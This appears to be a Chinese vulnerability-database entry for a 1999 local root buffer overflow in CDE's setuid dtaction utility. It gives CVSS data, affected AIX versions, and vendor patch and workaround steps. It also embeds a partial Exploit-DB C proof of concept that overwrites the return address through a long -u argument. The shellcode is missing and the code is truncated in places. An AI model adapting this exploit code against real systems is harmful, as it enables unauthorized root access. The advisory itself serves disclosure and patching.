发布时间 :1999-09-13 00:00:00
修订时间 :2008-09-09 08:35:14

[原文]Buffer overflow in the AddSuLog function of the CDE dtaction utility allows local users to gain root privileges via a long user name.

[CNNVD]多厂商CDE dtaction Userlag缓冲区溢出漏洞(CNNVD-199909-022)

        CDE dtaction实用程序的AddSuLog函数存在缓冲区溢出漏洞。本地用户可以借助一个长用户名获得根权限。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:ibm:aix:4.1.2IBM AIX 4.1.2
cpe:/o:ibm:aix:4.3.2IBM AIX 4.3.2
cpe:/o:ibm:aix:4.1.4IBM AIX 4.1.4
cpe:/o:ibm:aix:4.3IBM AIX 4.3
cpe:/o:ibm:aix:4.3.1IBM AIX 4.3.1
cpe:/o:ibm:aix:4.1.5IBM AIX 4.1.5
cpe:/o:ibm:aix:4.1.3IBM AIX 4.1.3
cpe:/o:ibm:aix:4.2.1IBM AIX 4.2.1
cpe:/o:ibm:aix:4.1IBM AIX 4.1
cpe:/o:ibm:aix:4.2IBM AIX 4.2
cpe:/o:ibm:aix:4.1.1IBM AIX 4.1.1

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:3078CDE AddSuLog Function Buffer Overflow

- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  SUN  00192

- 漏洞信息

多厂商CDE dtaction Userlag缓冲区溢出漏洞
高危 缓冲区溢出
1999-09-13 00:00:00 2005-05-02 00:00:00
        CDE dtaction实用程序的AddSuLog函数存在缓冲区溢出漏洞。本地用户可以借助一个长用户名获得根权限。

- 公告与补丁

        Updated SGI advisory (20021102-02-P) and patch details available.
        This solution information has been quoted from CERT Advisory CA-99-11: Four Vulnerabilities in the Common Desktop Environment. This advisory is referenced in the 'Credit' section of this vulnerability entry. Please note that some of these fixes are temporary, this information is not considered to be complete given that some vendors are still investigating this problem as of the posting of this entry and some of the provided information is incomplete.
        Compaq's Tru64/DIGITAL UNIX
        This potential security problem has been resolved and a patch for this problem has been made available for Tru64 UNIX V4.0D, V4.0E and V4.0F.
        This patch can be installed on:
        V4.0D Patch kit BL11 or BL12
        V4.0E Patch kit BL1 or BL12
        V4.0F Patch kit BL1
        *This solution will be included in a future distributed release of Compaq's Tru64/ DIGITAL UNIX.
        This patch may be obtained from the World Wide Web at the following FTP address:
        IBM Corporation
        All releases of AIX version 4 are vulnerable to vulnerabilities #1, #3, and #4. AIX is not vulnerable to #2. The following APARs will be available soon:
        AIX 4.1.x: IY03125 IY03847
         AIX 4.2.x: IY03105 IY03848
         AIX 4.3.x: IY02944 IY03849
        Customers that do not require the CDE desktop functionality can disable CDE by restricting access to the CDE daemons and removing the dt entry from /etc/inittab. Run the following commands as root to disable CDE:
        # /usr/dt/bin/dtconfig -d
         # chsubserver -d -v dtspc
         # chsubserver -d -v ttdbserver
         # chsubserver -d -v cmsd
         # chown root.system /usr/dt/bin/*
         # chmod 0 /usr/dt/bin/*
        For customers that require the CDE desktop functionality, a temporary fix is available via anonymous ftp from:
        Filename sum md5
         dtaction_4.1 32885 18 82af470bbbd334b240e874ff6745d8ca
         dtaction_4.2 52162 18 b10f21abf55afc461882183fbd30e602
         dtaction_4.3 56550 19 6bde84b975db2506ab0cbf9906c275ed
         libtt.a_4.1 29234 2132 f5d5a59956deb8b1e8b3a14e94507152
         libtt.a_4.2 21934 2132 73f32a73873caff06057db17552b8560
         libtt.a_4.3 12154 2118 b0d14b9fe4a483333d64d7fd695f084d
         ttauth 56348 31 495828ea74ec4c8f012efc2a9e6fa731
         ttsession_4.1 19528 337 bfac4a06b90cbccc0cd494a44bd0ebc9
         ttsession_4.2 46431 338 05949a483c4e390403055ff6961b0816
         ttsession_4.3 54031 339 e1338b3167c7edf899a33520a3adb060
        NOTE - This temporary fix has not been fully regression tested. Use the following steps (as root) to install the temporary fix.
        1. Uncompress and extract the fix.
        # uncompress < cdecert.tar.Z | tar xf -
         # cd cdecert
        2. Replace the vulnerable executables with the temporary fix for
         your version of AIX.
        # (cd /usr/dt/lib && mv libtt.a libtt.a.before_security_fix)
         # (cd /usr/dt/bin && mv ttsession ttsession.before_security_fix)
         # (cd /usr/dt/bin && mv dtaction dtaction.before_security_fix)
         # chown root.system /usr/dt/lib/libtt.a.before_security_fix
         # chown root.system /usr/dt/bin/ttsession.before_security_fix
         # chown root.system /usr/dt/bin/dtaction.before_security_fix
         # chmod 0 /usr/dt/lib/libtt.a.before_security_fix
         # chmod 0 /usr/dt/bin/ttsession.before_security_fix
         # chmod 0 /usr/dt/bin/dtaction.before_security_fix
         # cp ./libtt.a_ /usr/dt/lib/libtt.a
         # cp ./ttsession_ /usr/dt/bin/ttsession
         # cp ./dtaction_ /usr/dt/bin/dtaction
         # cp ./ttauth /usr/dt/bin/ttauth
         # chmod 555 /usr/dt/lib/libtt.a
         # chmod 555 /usr/dt/bin/ttsession
         # chmod 555 /usr/dt/bin/dtaction
         # chmod 555 /usr/dt/bin/ttauth
        IBM AIX APARs may be ordered using Electronic Fix Distribution (via the FixDist program), or from the IBM Support Center. For more information on FixDist, and to obtain fixes via the Internet, please reference
        or send electronic mail to "" with the word "FixDist" in the "Subject:" line. To facilitate ease of ordering all security related APARs for each AIX release, security fixes are periodically bundled into a cumulative APAR. For more information on these cumulative APARs including last update and list of individual fixes, send electronic mail to "" with the word "subscribe Security_APARs" in the "Subject:" line.
        Sun Microsystems
        The following patches are available:
        CDE versionPatch ID
        SunOS versionPatch ID
        SunOS 5.7sparc108219-01
        SunOS 5.7x86108220-01
        SunOS 5.6sparc108201-01
        SunOS 5.6x86108202-01
        Patches are available to all Sun customers at
        Sun Solaris 2.6

  •         Sun 108201-01


        IBM AIX 4.3

  •         IBM IY02944


        IBM AIX 4.3.1

  •         IBM IY02944


        IBM AIX 4.3.2

  •         IBM IY02944


        SGI IRIX 6.5
        SGI IRIX 6.5.1
        SGI IRIX 6.5.10
        SGI IRIX 6.5.10 f
        SGI IRIX 6.5.10 m
        SGI IRIX 6.5.11
        SGI IRIX 6.5.11 m
        SGI IRIX 6.5.11 f
        SGI IRIX 6.5.12 f
        SGI IRIX 6.5.12 m

  •         SGI 4416

- 漏洞信息 (19497)

DIGITAL UNIX 4.0 d/e/f,AIX <= 4.3.2,CDE <= 2.1,IRIX <= 6.5.14,Solaris <= 7.0 Buffer Overflow (EDBID:19497)
multiple local
1999-09-13 Verified
0 Job de Haas of ITSX
N/A [点击下载]
TRU64/DIGITAL UNIX 4.0 d/e/f,AIX <= 4.3.2,Common Desktop Environment <= 2.1,IRIX <= 6.5.14,Solaris <= 7.0 dtaction Userflag Buffer Overflow Vulnerability  


CDE is the Common Desktop Environment, an implementation of a Desktop Manager for systems that run X. It is distributed with various commercial UNIX implementations.

Under some distributions of CDE Common Desktop Environment, the dtaction program has a locally exploitable buffer overflow condition. The buffer overflow condition exists in the argument parsing code for the -u (user) function. Any information provided by the user over 1024 bytes may overwrite the buffer and in return be exploited by a malicious user.

Since the dtaction program is typically installed setuid root, this make it possible for a local user to gain administrative access on a vulnerable system.

* dtaction_ov.c
* Job de Haas
* (c) ITSX bv 1999
* This program demonstrates an overflow problem in /usr/dt/bin/dtaction.
* It has only been tested on Solaris 7 x86
* assembly code has been taken from ex_dtprintinfo86.c by

#include <stdio.h>

#include <stdlib.h>
#include <string.h>
#include <pwd.h>

#define BUFLEN 998

char exploit_code[] =

char *argp[6], *envp[3];
char buf[2048];
unsigned long *p;
struct passwd *pw;
int buflen;

if ((pw = getpwuid(getuid())) == NULL) {

buflen = BUFLEN - strlen( pw->pw_name );


strncpy( &buf[500], exploit_code, strlen(exploit_code));

/* set some pointers to values that keep code running */
p = (unsigned long *)&buf[buflen];
*p++ = 0x37dc779b;
*p++ = 0xdfaf6502;
*p++ = 0x08051230;
*p++ = 0x080479b8;

/* the return address. */
*p++ = 0x08047710;
*p = 0;

argp[0] = strdup("/usr/dt/bin/dtaction");
argp[1] = strdup("-u");
argp[2] = strdup(buf);
argp[3] = strdup("Run");
argp[4] = strdup("/usr/bin/id");
argp[5] = NULL;

if (!getenv("DISPLAY")) {
printf("forgot to set DISPLAY\n");

envp[0] = malloc( strlen("DISPLAY=")+strlen(getenv("DISPLAY"))+1);
envp[1] = NULL;




- 漏洞信息

Multiple Vendor CDE dtaction AddSuLog Function Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public Vendor Verified, Third-party Verified

- 漏洞描述

- 时间线

1999-09-13 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, multiple vendors have released patches to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete